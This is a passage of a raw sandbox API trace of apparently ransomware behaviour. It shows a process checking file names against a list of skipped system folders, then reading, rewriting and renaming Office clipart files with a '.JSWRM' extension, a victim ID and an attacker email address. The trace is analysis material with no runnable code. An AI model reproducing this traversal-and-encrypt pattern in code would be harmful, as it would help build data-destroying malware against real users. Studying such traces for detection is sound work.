hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0087.216] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0087.216] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196142.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0196142.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196142.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0196142.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.217] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0087.217] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0087.217] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0087.217] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebae9de, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xebae9de, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xebae9de, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3586, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0196354.WMF", cAlternateFileName="")) returned 1 [0087.217] lstrcmpiW (lpString1="J0196354.WMF", lpString2=".") returned 1 [0087.217] lstrcmpiW (lpString1="J0196354.WMF", lpString2="..") returned 1 [0087.217] lstrcmpiW (lpString1="J0196354.WMF", lpString2="...") returned 1 [0087.217] lstrcmpiW (lpString1="J0196354.WMF", lpString2="windows") returned -1 [0087.217] lstrcmpiW (lpString1="J0196354.WMF", lpString2="recovery") returned -1 [0087.217] lstrcmpiW (lpString1="J0196354.WMF", lpString2="perflogs") returned -1 [0087.217] lstrcmpiW (lpString1="J0196354.WMF", lpString2="documents and settings") returned 1 [0087.217] lstrcmpiW (lpString1="J0196354.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.217] lstrcmpiW (lpString1="J0196354.WMF", lpString2="system volume information") returned -1 [0087.217] lstrcmpiW (lpString1="J0196354.WMF", lpString2="msocache") returned -1 [0087.217] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0087.217] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0196354.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.217] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0196354.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0196354.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.217] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0087.217] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0087.217] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0196354.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.217] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0196354.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0196354.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.217] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0087.217] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0087.217] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0087.217] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.217] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.217] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0087.217] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196354.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0196354.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.218] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=13702) returned 1 [0087.218] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.218] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3580) returned 0x24d210 [0087.218] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3580, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3580, lpOverlapped=0x0) returned 1 [0087.302] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.302] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3580, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3580, lpOverlapped=0x0) returned 1 [0087.302] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0087.302] CloseHandle (hObject=0x314) returned 1 [0087.302] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0087.302] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.302] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0087.302] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.302] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0087.302] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0087.302] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.303] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0087.303] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.303] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0087.303] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0087.303] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0087.303] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0087.303] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0087.303] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196354.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0196354.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196354.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0196354.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.304] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0087.304] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0087.305] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0087.305] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb88785, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeb88785, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb88785, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1b00, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0196358.WMF", cAlternateFileName="")) returned 1 [0087.305] lstrcmpiW (lpString1="J0196358.WMF", lpString2=".") returned 1 [0087.305] lstrcmpiW (lpString1="J0196358.WMF", lpString2="..") returned 1 [0087.305] lstrcmpiW (lpString1="J0196358.WMF", lpString2="...") returned 1 [0087.305] lstrcmpiW (lpString1="J0196358.WMF", lpString2="windows") returned -1 [0087.305] lstrcmpiW (lpString1="J0196358.WMF", lpString2="recovery") returned -1 [0087.305] lstrcmpiW (lpString1="J0196358.WMF", lpString2="perflogs") returned -1 [0087.305] lstrcmpiW (lpString1="J0196358.WMF", lpString2="documents and settings") returned 1 [0087.305] lstrcmpiW (lpString1="J0196358.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.305] lstrcmpiW (lpString1="J0196358.WMF", lpString2="system volume information") returned -1 [0087.305] lstrcmpiW (lpString1="J0196358.WMF", lpString2="msocache") returned -1 [0087.305] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0087.305] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0196358.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.305] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0196358.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0196358.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.305] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0087.305] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0087.305] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0196358.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.305] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0196358.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0196358.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.305] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0087.305] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0087.305] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0087.305] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.305] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.305] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0087.305] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196358.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0196358.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.306] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6912) returned 1 [0087.306] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1b00) returned 0x205850 [0087.307] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1b00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1b00, lpOverlapped=0x0) returned 1 [0087.309] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.309] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1b00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1b00, lpOverlapped=0x0) returned 1 [0087.309] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0087.309] CloseHandle (hObject=0x314) returned 1 [0087.310] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0087.310] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.310] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0087.310] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.310] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0087.310] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0087.310] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.310] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0087.310] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.310] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0087.310] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0087.310] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0087.310] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0087.310] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0087.310] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196358.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0196358.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196358.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0196358.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.311] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0087.311] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0087.311] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0087.311] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb88785, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeb88785, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb88785, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x164c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0196364.WMF", cAlternateFileName="")) returned 1 [0087.311] lstrcmpiW (lpString1="J0196364.WMF", lpString2=".") returned 1 [0087.311] lstrcmpiW (lpString1="J0196364.WMF", lpString2="..") returned 1 [0087.311] lstrcmpiW (lpString1="J0196364.WMF", lpString2="...") returned 1 [0087.311] lstrcmpiW (lpString1="J0196364.WMF", lpString2="windows") returned -1 [0087.311] lstrcmpiW (lpString1="J0196364.WMF", lpString2="recovery") returned -1 [0087.311] lstrcmpiW (lpString1="J0196364.WMF", lpString2="perflogs") returned -1 [0087.311] lstrcmpiW (lpString1="J0196364.WMF", lpString2="documents and settings") returned 1 [0087.311] lstrcmpiW (lpString1="J0196364.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.311] lstrcmpiW (lpString1="J0196364.WMF", lpString2="system volume information") returned -1 [0087.311] lstrcmpiW (lpString1="J0196364.WMF", lpString2="msocache") returned -1 [0087.311] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0087.311] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0196364.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.311] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0196364.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0196364.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.311] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0087.311] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0087.311] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0196364.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.311] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0196364.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0196364.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.311] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0087.311] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0087.311] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0087.311] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.312] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.312] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0087.312] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196364.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0196364.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.312] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5708) returned 1 [0087.312] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.312] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1640) returned 0x205850 [0087.312] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1640, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1640, lpOverlapped=0x0) returned 1 [0087.326] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.326] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1640, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1640, lpOverlapped=0x0) returned 1 [0087.326] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0087.326] CloseHandle (hObject=0x314) returned 1 [0087.326] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0087.326] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.326] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0087.326] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.326] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0087.327] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0087.327] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.327] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0087.327] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.327] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0087.327] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0087.327] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0087.327] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0087.327] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0087.327] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196364.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0196364.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196364.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0196364.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.328] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0087.328] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0087.328] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0087.328] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb88785, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeb88785, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb88785, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9d26, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0197979.WMF", cAlternateFileName="")) returned 1 [0087.328] lstrcmpiW (lpString1="J0197979.WMF", lpString2=".") returned 1 [0087.328] lstrcmpiW (lpString1="J0197979.WMF", lpString2="..") returned 1 [0087.328] lstrcmpiW (lpString1="J0197979.WMF", lpString2="...") returned 1 [0087.328] lstrcmpiW (lpString1="J0197979.WMF", lpString2="windows") returned -1 [0087.328] lstrcmpiW (lpString1="J0197979.WMF", lpString2="recovery") returned -1 [0087.328] lstrcmpiW (lpString1="J0197979.WMF", lpString2="perflogs") returned -1 [0087.328] lstrcmpiW (lpString1="J0197979.WMF", lpString2="documents and settings") returned 1 [0087.328] lstrcmpiW (lpString1="J0197979.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.328] lstrcmpiW (lpString1="J0197979.WMF", lpString2="system volume information") returned -1 [0087.328] lstrcmpiW (lpString1="J0197979.WMF", lpString2="msocache") 